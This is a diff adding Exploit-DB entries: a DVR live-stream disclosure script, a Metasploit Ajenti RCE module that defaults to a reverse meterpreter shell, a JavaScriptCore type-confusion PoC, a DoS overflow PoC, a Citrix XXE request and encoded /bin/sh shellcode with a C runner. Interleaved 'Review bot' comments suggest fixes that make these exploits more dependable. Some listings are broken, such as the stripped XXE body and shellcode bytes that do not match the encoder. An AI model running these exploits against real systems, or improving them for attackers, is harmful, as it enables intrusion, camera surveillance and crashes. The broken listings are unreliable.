diff --git a/exploits/hardware/webapps/47562.sh b/exploits/hardware/webapps/47562.sh
new file mode 100755
index 000000000..c21ca9c26
--- /dev/null
+++ b/exploits/hardware/webapps/47562.sh
@@ -0,0 +1,67 @@
+# Title: iSeeQ Hybrid DVR WH-H4 2.0.0.P - (get_jpeg) Stream Disclosure
+# Date: 2019-10-29
+# Author: LiquidWorm
+# Vendor:iSeeQ
+# Link: http://www.iseeq.co.kr
+# CVE: N/A
+
+#!/bin/bash
+#
+#
+# iSeeQ Hybrid DVR WH-H4 1.03R / 2.0.0.P (get_jpeg) Stream Disclosure
+#
+#
+# Vendor: iSeeQ
+# Product web page: http://www.iseeq.co.kr
+# Affected version: WH-H4 1.03R / 2.0.0.P
+#
+# Summary: The 4/8/16 channel hybrid standalone DVR delivers high quality
+# pictures which adopts high performance video processing chips and embedded
+# Linux system. This advanced video digital platform is very useful to identify
+# an object from a long distance.
+#
+# Desc: The DVR suffers from an unauthenticated and unauthorized live stream
+# disclosure when get_jpeg script is called.
+#
+# Tested on: Boa/0.94.13
+# PHP/7.0.22
+# DVR Web Server
+#
+#
+# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+# @zeroscience
+#
+#
+# Advisory ID: ZSL-2019-5539
+# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5539.php
+#
+#
+# 28.10.2019
+#
+
+
+if [ "$#" -ne 2 ]; then
+ echo "Usage: $0 IP:PORT CHANNEL"
+ exit
+fi
+IP=$1
+CHANNEL=$2
+HOST="http://$IP/cgi-bin/get_jpeg?ch=$CHANNEL"
+STATUS=$(curl -Is http://$IP/cgi-bin/php/login.php 2>/dev/null | head -1 | awk -F" " '{print $2}')
+if [ "$STATUS" == "404" ]; then
+ echo "Target not vulnerable!"
+ exit
+fi
+echo "Collecting snapshots..."
+for x in {1..10};
+ do echo -ne $x
+ curl "$HOST" -o seq-$x.jpg -#;
+ sleep 0.8
+ done
+echo -ne "\nDone."
+echo -ne "\nRendering video..."
+ffmpeg -t 10 -v quiet -s 352x288 -r 1 -an -i seq-%01d.jpg -c:v libx264 -vf fps=10 -pix_fmt yuvj422p clip.mp4
+echo " done."
+echo -ne "\nRunning animation..."
+sleep 1
+cvlc clip.mp4 --verbose -1 -f vlc://quit
\ No newline at end of file
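Review bot: The vulnerability check at `STATUS=$(curl -Is http://$IP/cgi-bin/php/login.php ...)` only tests whether the login page exists, so a DVR that answers 404 there is declared "not vulnerable" while any host that serves it is assumed exploitable without get_jpeg ever being probed; test the endpoint itself, e.g. `STATUS=$(curl -s -o /dev/null -w '%{http_code}' "$HOST")`, and treat only a 200 with an `image/jpeg` content type as vulnerable. The `#!/bin/bash` line sits below the Exploit-DB header comments, so when the file is run as `sh 47562.sh` the `{1..10}` brace expansion is not performed and a single `seq-{1..10}.jpg` is fetched; either move the shebang to line 1 or state that bash is required. With `-v quiet`, ffmpeg also hides the case where the ten downloads were error pages rather than JPEGs, so a failed run still prints "done."; `$IP` should be quoted in the curl URL as `$HOST` already is.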
diff --git a/exploits/json/webapps/47560.rb b/exploits/json/webapps/47560.rb
new file mode 100755
index 000000000..cf1b345c6
--- /dev/null
+++ b/exploits/json/webapps/47560.rb
@@ -0,0 +1,85 @@ +# Exploit Title: Ajenti 2.1.31 - Remote Code Exection (Metasploit) +# Date: 2019-10-29 +# Exploit Author: Onur ER +# Vendor Homepage: http://ajenti.org/ +# Software Link: https://github.com/ajenti/ajenti +# Version: 2.1.31 +# Tested on: Ubuntu 19.10 + +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + + def initialize(info = {}) + super(update_info(info, + 'Name' => "Ajenti 2.1.31 Remote Code Execution", + 'Description' => %q{ + This module exploits a command injection in Ajenti <= 2.1.31. + By injecting a command into the username POST parameter to api/core/auth, a shell can be spawned. + }, + 'Author' => [ + 'Jeremy Brown', # Vulnerability discovery + 'Onur ER ' # Metasploit module + ], + 'References' => [ + ['EDB', '47497'] + ], + 'DisclosureDate' => '2019-10-14', + 'License' => MSF_LICENSE, + 'Platform' => 'python', + 'Arch' => ARCH_PYTHON, + 'Privileged' => false, + 'Targets' => [ + [ 'Ajenti <= 2.1.31', {} ] + ], + 'DefaultOptions' => + { + 'RPORT' => 8000, + 'SSL' => 'True', + 'payload' => 'python/meterpreter/reverse_tcp' + }, + 'DefaultTarget' => 0 + )) + register_options([ + OptString.new('TARGETURI', [true, 'Base path', '/']) + ]) + end + + def check + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => "/view/login/normal" + }) + if res and res.code == 200 + if res.body =~ /'ajentiVersion', '2.1.31'/ + return Exploit::CheckCode::Vulnerable + elsif res.body =~ /Ajenti/ + return Exploit::CheckCode::Detected + end + end + vprint_error("Unable to determine due to a HTTP connection timeout") + return Exploit::CheckCode::Unknown + end + + + def exploit + print_status("Exploiting...") + random_password = rand_text_alpha_lower(7) + json_body = { 'username' => "`python -c \"#{payload.encoded}\"`", + 'password' => random_password, + 
'mode' => 'normal'
+ }
+ res = send_request_cgi({
+ 'method' => 'POST',
+ 'uri' => normalize_uri(target_uri, 'api', 'core', 'auth'),
+ 'ctype' => 'application/json',
+ 'data' => JSON.generate(json_body)
+ })
+ end
+end
\ No newline at end of file
diff --git a/exploits/multiple/dos/47565.txt b/exploits/multiple/dos/47565.txt
new file mode 100644
index 000000000..54eb100fb
--- /dev/null
+++ b/exploits/multiple/dos/47565.txt
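Review bot: `check` requests the hard-coded absolute path `"/view/login/normal"` and so ignores the TARGETURI option that `exploit` honors via `normalize_uri(target_uri, 'api', 'core', 'auth')`; on any install served under a path prefix the check returns Unknown while the exploit would still fire, so use `'uri' => normalize_uri(target_uri, 'view', 'login', 'normal')`. The version match `/'ajentiVersion', '2.1.31'/` reports only that exact build as Vulnerable although the description claims `<= 2.1.31`, so every older affected version is downgraded to Detected. In `exploit` the POST response is assigned to `res` and never examined, so a refused connection or non-2xx reply fails silently; add `fail_with(Failure::Unreachable, 'No response from target') unless res` after the request. The username is injected as `` `python -c "#{payload.encoded}"` `` inside a double-quoted string, so if the encoded Python payload ever contains a double quote or backtick the command breaks; presumably the stager is quote-free, but a comment stating that assumption would help the next maintainer.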
@@ -0,0 +1,102 @@ +The following JavaScript program, found by Fuzzilli and slightly modified, crashes JavaScriptCore built from HEAD and the current stable release (/System/Library/Frameworks/JavaScriptCore.framework/Resources/jsc): + + let notAGetterSetter = {whatever: 42}; + + function v2(v5) { + const v10 = Object(); + if (v5) { + const v12 = {set:Array}; + const v14 = Object.defineProperty(v10,"length",v12); + const v15 = (140899729)[140899729]; + } else { + v10.length = notAGetterSetter; + } + const v18 = new Uint8ClampedArray(49415); + v18[1] = v10; + const v19 = v10.length; + let v20 = 0; + while (v20 < 100000) { + v20++; + } + } + const v26 = v2(); + for (let v32 = 0; v32 < 1000; v32++) { + const v33 = v2(true); + } + + /* + Crashes with: + ASSERTION FAILED: from.isCell() && from.asCell()->JSCell::inherits(*from.asCell()->vm(), std::remove_pointer::type::info()) + ../../Source/JavaScriptCore/runtime/JSCast.h(44) : To JSC::jsCast(JSC::JSValue) [To = JSC::GetterSetter *] + 1 0x1111ada79 WTFCrash + 2 0x1111ada99 WTFCrashWithSecurityImplication + 3 0x10ffb8f55 JSC::GetterSetter* JSC::jsCast(JSC::JSValue) + 4 0x10ffaf820 JSC::DFG::AbstractInterpreter::executeEffects(unsigned int, JSC::DFG::Node*) + 5 0x10ff9f37b JSC::DFG::AbstractInterpreter::execute(unsigned int) + 6 0x10ff9def2 JSC::DFG::CFAPhase::performBlockCFA(JSC::DFG::BasicBlock*) + 7 0x10ff9d957 JSC::DFG::CFAPhase::performForwardCFA() + 8 0x10ff9d647 JSC::DFG::CFAPhase::run() + 9 0x10ff9cc61 bool JSC::DFG::runAndLog(JSC::DFG::CFAPhase&) + 10 0x10ff6c65b bool JSC::DFG::runPhase(JSC::DFG::Graph&) + 11 0x10ff6c625 JSC::DFG::performCFA(JSC::DFG::Graph&) + 12 0x110279031 JSC::DFG::Plan::compileInThreadImpl() + 13 0x110274fa6 JSC::DFG::Plan::compileInThread(JSC::DFG::ThreadData*) + 14 0x11052a9bb JSC::DFG::Worklist::ThreadBody::work() + 15 0x1111b3c69 WTF::AutomaticThread::start(WTF::AbstractLocker const&)::$_0::operator()() const + 16 0x1111b38a9 WTF::Detail::CallableWrapper::call() + 17 0x1102c433a 
WTF::Function::operator()() const + 18 0x1111f0350 WTF::Thread::entryPoint(WTF::Thread::NewThreadContext*) + 19 0x111285525 WTF::wtfThreadEntryPoint(void*) + 20 0x7fff5a7262eb _pthread_body + 21 0x7fff5a729249 _pthread_start + 22 0x7fff5a72540d thread_start + */ + +The assertion indicates that a JSCell is incorrectly downcasted to a GetterSetter [1] (a pseudo object used to implement property getters/setter). In non debug builds, a type confusion then follows. + +Below is my preliminary analysis of the cause of the bug. + +The function v2 is eventually JIT compiled by the FTL JIT compiler. Initially, it will create the following (pseudo) DFG IR for it: + +# Block 0 (before if-else): + 44: NewObject(...) + + +# Block 1 (the if part): + ... + // Code for const v15 = (140899729)[140899729]; + ForceOSRExit + Unreachable + +# Block 2 (the else part) + PutByOffset @44, notAGetterSetter + PutStructure + +# Block 3 (after the if-else): + ... + // Code for v10.length. Due to feedback from previous executions, DFG + // JIT speculates that the if branch will be taken and that it will see + // v10 with a GetterSetter for .length here + CheckStructure @44, structureWithLengthBeingAGetterSetter + 166: GetGetterSetterByOffset @44, .length // Load the GetterSetter object from @44 + 167: GetGetter @166 // Load the getter function from the GetterSetter + ... + + +Here, the end of block 1 has already been marked as unreachable due to the element load from a number which will always cause a bailout. 
+ +Later, the global subexpression elimination phase [2] runs and does the following (which can be seen by enabling verbose CSE [3]): + +* It determines that the GetGetterSetterByOffset node loads the named property from the object @44 +* It determines that this property slot is assigned in block 2 (the else block) and that this block strictly dominates the current block (meaning that the current block can only be reached through block 2) + * This is now the case as block 1 does a bailout, so block 3 can never be reached from block 1 +* As such, CSE replaces the GetGetterSetterByOffset operation with the constant for |notAGetterSetter| (as that is what is assigned in block 2). + +At this point the IR is incorrect as the input to a GetGetter operation is expected to be a GetterSetter object, but in this case it is not. During later optimizations, e.g. the AbstractInterpreter relies on that invariant and casts the input to a GetterSetter object [4]. At that point JSC crashes in debug builds with the above assertion. It might also be possible to trigger the type confusion at runtime instead of at compile time but I have not attempted that. + + + +[1] https://github.com/WebKit/webkit/blob/87064d847a0f1b22a9bb400647647fe4004a4ccd/Source/JavaScriptCore/runtime/GetterSetter.h#L43 +[2] https://github.com/WebKit/webkit/blob/87064d847a0f1b22a9bb400647647fe4004a4ccd/Source/JavaScriptCore/dfg/DFGCSEPhase.h#L49 +[3] https://github.com/WebKit/webkit/blob/87064d847a0f1b22a9bb400647647fe4004a4ccd/Source/JavaScriptCore/dfg/DFGCSEPhase.cpp#L51 +[4] https://github.com/WebKit/webkit/blob/87064d847a0f1b22a9bb400647647fe4004a4ccd/Source/JavaScriptCore/dfg/DFGAbstractInterpreterInlines.h#L2811 \ No newline at end of file diff --git a/exploits/windows/dos/47563.py b/exploits/windows/dos/47563.py new file mode 100755 index 000000000..169626d57 --- /dev/null +++ b/exploits/windows/dos/47563.py 
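Review bot: The only reproduction evidence shown is a debug-build assertion (`ASSERTION FAILED: from.isCell() && ... JSC::jsCast`), and the text itself says that in non-debug builds the result is a type confusion rather than this crash, yet the opening sentence also claims the stock release `/System/Library/Frameworks/JavaScriptCore.framework/Resources/jsc` crashes; a release-build crash output, or a line such as `The assertion below requires an ASSERT-enabled build; release builds hit the resulting type confusion instead`, would make that claim checkable for readers running the file as a DoS PoC. The "preliminary analysis" section would also benefit from naming the tree revision `87064d8` it links to next to the PoC, since the CSE behaviour described is revision-specific.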
@@ -0,0 +1,28 @@
+# Exploit Title: WMV to AVI MPEG DVD WMV Convertor 4.6.1217 - Denial of Service
+# Date: 2019-10-30
+# Vendor Homepage:https://www.alloksoft.com/
+# Software Link: https://www.alloksoft.com/wmv.htm
+# Exploit Author: Nithoshitha S
+# Tested Version: v4.6.1217
+# Tested on: Windows 7 x64
+# Windows XP SP3
+
+# 1.- Run python code :poc.py
+# 2.- Open EVIL.txt and copy content to clipboard
+# 3.- Open WMV to AVI MPEG DVD WMV Convertor and Click 'EnterKey'
+# 4.- Paste the content of EVIL.txt into the Field: 'License Name and License Code'
+# 5.- Click 'OK' and you will see a crash.
+
+# poc.py
+
+#!/usr/bin/env python
+buffer = "\x41" * 6000
+
+try:
+f=open("Evil.txt","w")
+print "[+] Creating %s bytes evil payload.." %len(buffer)
+f.write(buffer)
+f.close()
+print "[+] File created!"
+except:
+print "File cannot be created"
\ No newline at end of file
diff --git a/exploits/xml/webapps/47561.txt b/exploits/xml/webapps/47561.txt
new file mode 100644
index 000000000..69bac20a5
--- /dev/null
+++ b/exploits/xml/webapps/47561.txt
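Review bot: The body of the `try:` block (`f=open("Evil.txt","w")` through `print "[+] File created!"`) appears at column 0 here, which is a syntax error in Python; if that is only indentation lost in this listing it should still be restored, since the PoC is meant to be copied and run as `poc.py`. The bare `except:` also hides the actual reason the file could not be written; `except IOError as e: print "File cannot be created: %s" % e` keeps the behaviour and reports it. The steps refer to `EVIL.txt` while the script writes `Evil.txt`; it happens to work on Windows' case-insensitive filesystem, but the names should agree. The `#!/usr/bin/env python` and print statements are Python 2 only, which the header should state.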
@@ -0,0 +1,35 @@ +# Exploit Title: Citrix StoreFront Server 7.15 - XML External Entity Injection +# Date: 2019-08-28 +# Exploit Author: Vahagn Vardanya +# Vendor Homepage:https://www.citrix.com/downloads/storefront/ +# Software Link: https://support.citrix.com/article/CTX251988 +# Version: +# Citrix StoreFront Server earlier than 1903 +# Citrix StoreFront Server 7.15 LTSR earlier than CU4 (3.12.4000) +# Citrix StoreFront Server 7.6 LTSR earlier than CU8 (3.0.8000)# +# Tested on: Windows +# Shodan query https://www.shodan.io/search?query=%2FCitrix%2FStoreWeb + +# PoC + +POST /Citrix/StoreAuth/ExplicitForms/Start HTTP/1.1 +Content-Type: application/vnd.citrix.requesttoken+xml +Accept: application/vnd.citrix.requesttokenresponse+xml, application/vnd. +citrix.authenticateresponse-1+xml +Accept-Language:ru,en-US;q=0.9,en;q=0.8,fr;q=0.7,hy;q=0.6,de;q=0.5,es;q=0.4,nb;q=0.3,nl;q=0.2,fi;q=0.1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36(KHTML, like Gecko) Chrome/72.0.3626.109 Safari/537.36 +X-Forwarded-For: 192.168.204.1 +X-Citrix-Agent: crm. +X-Citrix-AM-CredentialTypes: none, username, domain, password, newpassword,passcode, savecredentials, textcredential, webview, webview +X-Citrix-AM-LabelTypes: none, plain, heading, information, warning, error,confirmation, image +X-Citrix-IsUsingHTTPS: No +Host: 192.168.204.131 +Content-Length: 331 +Expect: 100-continue + +%xxe; ]>ahttp://secure-web.cisco.com/ +0.08:00:00 \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index e3b1663ee..30fc513e3 100644 --- a/files_exploits.csv +++ b/files_exploits.csv 
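Review bot: The request body after the headers is missing its XML prolog and the `<!DOCTYPE` with the `<!ENTITY % xxe SYSTEM ...>` declaration that the surviving `%xxe; ]>` refers to, so the PoC cannot be replayed from this entry as listed and `Content-Length: 331` no longer matches what is shown; the complete XML should be restored (the hunk header's 35 lines suggests it was there before rendering stripped the tags). The external URL in what remains, `http://secure-web.cisco.com/`, looks like a mail-gateway rewritten link rather than the author's listener, so readers should substitute their own out-of-band host. The `# Version:` field is empty with the affected builds listed on the following lines, and the `X-Forwarded-For` / `Host` values are the author's lab addresses; folding the versions into the field and marking the addresses as placeholders would keep the header usable.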
@@ -6582,6 +6582,8 @@ id,file,description,date,author,type,platform,port 47525,exploits/windows/dos/47525.txt,"winrar 5.80 64bit - Denial of Service",2019-10-21,alblalawi,dos,windows, 47528,exploits/windows/dos/47528.txt,"Adobe Acrobat Reader DC for Windows - Heap-Based Buffer Overflow due to Malformed JP2 Stream (2)",2019-10-21,"Google Security Research",dos,windows, 47552,exploits/multiple/dos/47552.txt,"WebKit - Universal XSS in HTMLFrameElementBase::isURLAllowed",2019-10-28,"Google Security Research",dos,multiple, +47563,exploits/windows/dos/47563.py,"WMV to AVI MPEG DVD WMV Convertor 4.6.1217 - Denial of Service",2019-10-30,"Nithoshitha S",dos,windows, +47565,exploits/multiple/dos/47565.txt,"JavaScriptCore - GetterSetter Type Confusion During DFG Compilation",2019-10-30,"Google Security Research",dos,multiple, 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux, 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris, 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux, 
@@ -41878,3 +41880,6 @@ id,file,description,date,author,type,platform,port 47553,exploits/php/webapps/47553.md,"PHP-FPM + Nginx - Remote Code Execution",2019-10-28,"Emil Lerner",webapps,php, 47555,exploits/php/webapps/47555.py,"rConfig 3.9.2 - Remote Code Execution",2019-10-29,Askar,webapps,php, 47557,exploits/php/webapps/47557.txt,"Wordpress 5.2.4 - Cross-Origin Resource Sharing",2019-10-29,"Milad Khoshdel",webapps,php, +47560,exploits/json/webapps/47560.rb,"Ajenti 2.1.31 - Remote Code Exection (Metasploit)",2019-10-30,"Onur ER",webapps,json, +47561,exploits/xml/webapps/47561.txt,"Citrix StoreFront Server 7.15 - XML External Entity Injection",2019-10-30,"Vahagn Vardanyan",webapps,xml, +47562,exploits/hardware/webapps/47562.sh,"iSeeQ Hybrid DVR WH-H4 2.0.0.P - (get_jpeg) Stream Disclosure",2019-10-30,LiquidWorm,webapps,hardware, diff --git a/files_shellcodes.csv b/files_shellcodes.csv index 3f1b9c389..2e5fc06d0 100644 --- a/files_shellcodes.csv +++ b/files_shellcodes.csv @@ -1008,3 +1008,4 @@ id,file,description,date,author,type,platform 47513,shellcodes/linux/47513.c,"Linux/x86 - execve /bin/sh Shellcode (25 bytes)",2019-10-16,bolonobolo,shellcode,linux 47514,shellcodes/linux/47514.c,"Linux/x86 - Reverse Shell NULL free 127.0.0.1:4444 Shellcode (91 bytes)",2019-10-16,bolonobolo,shellcode,linux 47530,shellcodes/linux/47530.txt,"Linux/x86 - execve(/bin/sh) socket reuse Shellcode (42 bytes)",2019-10-22,WangYihang,shellcode,linux +47564,shellcodes/linux/47564.py,"Linux/x86 - (NOT|ROT+8 Encoded) execve(/bin/sh) null-free Shellcode (47 bytes)",2019-10-30,"Daniel Ortiz",shellcode,linux diff --git a/shellcodes/linux/47564.py b/shellcodes/linux/47564.py new file mode 100755 index 000000000..ea0702ceb --- /dev/null +++ b/shellcodes/linux/47564.py 
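Review bot: The new 47560 row carries the title typo `Remote Code Exection` (copied from the module header), and the 47561 row's author `Vahagn Vardanyan` does not match `Vahagn Vardanya` in 47561.txt's header; one side should be corrected so index and file agree, e.g. `47560,exploits/json/webapps/47560.rb,"Ajenti 2.1.31 - Remote Code Execution (Metasploit)",2019-10-30,"Onur ER",webapps,json,`. The 47562 row's description `2.0.0.P` also omits the `1.03R` build the exploit header lists as affected.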
@@ -0,0 +1,133 @@ +# Title: Linux/x86 (NOT|ROT+8 Encoded) execve(/bin/sh) null-free Shellcode (47 bytes) +# Author: Daniel Ortiz +# Date: 2019-10-30 +# Tested on: Linux 4.18.0-25-generic #26 Ubuntu +# Size: 47 bytes +# SLAE ID: PA-9844 + +#----------------------- execve ------------------------------------------------# + +global _start + +section .text + +_start: + + xor eax, eax + push eax + + ; PUSH //bin/sh (8 bytes) + + push 0x68732f2f + push 0x6e69622f + mov ebx, esp + + push eax + mov edx, esp + + push ebx + mov ecx, esp + + mov al, 11 + int 0x80 + +#------------------------ execve shellcode -------------------------------------# + +"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80" + +#----------------------- Python Encoder ----------------------------------------# + +#!/usr/bin/python + +shellcode = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80" + +encoded = "" +encoded2 = "" + +rot = 8 + +print 'Encoded shellcode ...' 
+ +for x in bytearray(shellcode) : + # NOT encoding + y = ~x + + # ROT 8 encoding + h = (y + rot)%256 + + encoded += '\\x' + encoded += '%02x' % (h & 0xff) + + encoded2 += '0x' + encoded2 += '%02x,' %(h & 0xff) + + +print encoded + +print encoded2 + +print 'Len: %d' % len(bytearray(shellcode)) + +#---------------------- Assembly Code ------------------------------------------# + + +global _start + +section .text +_start: + jmp short call_shellcode + +decoder: + pop esi + xor ecx, ecx + mov cl, 25 + + +decode: + + sub byte [esi], 8 + not byte [esi] + inc esi + loop decode + + jmp short EncodedShellcode + +call_shellcode: + + call decoder + + EncodedShellcode: db 0xd6,0x47,0xb7,0x9f,0xd8,0xd8,0x94,0x9f,0x9f,0xd8,0xa5,0x9e,0x99,0x7e,0x24,0xb7,0x7e,0x25,0xb4,0x7e,0x26,0x57,0xfc,0x3a,0x87 + +#------------------------- final shellcode ----------------------------------------# + +unsigned char buf[] = + + +"\xeb\x0f\x5e\x31\xc0\xb0\x19\x80\x2e\x08\xfe" +"\xc8\x74\x08\x46\xeb\xf6\xe8\xec\xff\xff\xff" +"\x39\xc8\x58\x70\x37\x37\x7b\x70\x70\x37\x6a" +"\x71\x76\x91\xeb\x58\x91\xea\x5b\x91\xe9\xb8" +"\x13\x88"; + +#------------------------- C wrapper --------------------------------------------------# + +#include +#include + +unsigned char code[] = \ + +"\xeb\x0f\x5e\x31\xc0\xb0\x19\x80\x2e\x08\xfe" +"\xc8\x74\x08\x46\xeb\xf6\xe8\xec\xff\xff\xff" +"\x39\xc8\x58\x70\x37\x37\x7b\x70\x70\x37\x6a" +"\x71\x76\x91\xeb\x58\x91\xea\x5b\x91\xe9\xb8" +"\x13\x88"; + + +int main() +{ + + printf("Shellcode Length: %d\n", strlen(code)); + int (*ret)() = (int(*)())code; + ret(); + +} \ No newline at end of file
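Review bot: The `final shellcode` and `C wrapper` byte strings do not correspond to the NOT|ROT+8 encoder and decoder listed above them: their payload begins `\x39\xc8\x58...`, which is the original `\x31\xc0\x50...` plus 8 with no NOT applied, and their decoder (`\x80\x2e\x08` sub byte [esi],8 followed by `\xfe\xc8` / `\x74\x08` dec al / jz) never executes the `not byte [esi]` from the assembly, whereas the `EncodedShellcode: db 0xd6,0x47,...` bytes are the NOT|ROT+8 form (0xd6 - 8 = 0xce, ~0xce = 0x31). One of the two listings is a different variant; the shipped bytes should be regenerated from the assembled decoder (including `not byte [esi]`, `f6 16`) over the 0xd6,0x47,... payload so the title, the encoder and the final shellcode agree. The `#include` lines in the C wrapper appear to have lost their header names in this rendering (`<stdio.h>`, `<string.h>`), and `ret()` executes from the `.data` array, which on current toolchains needs `-z execstack`; both belong in the header as build notes.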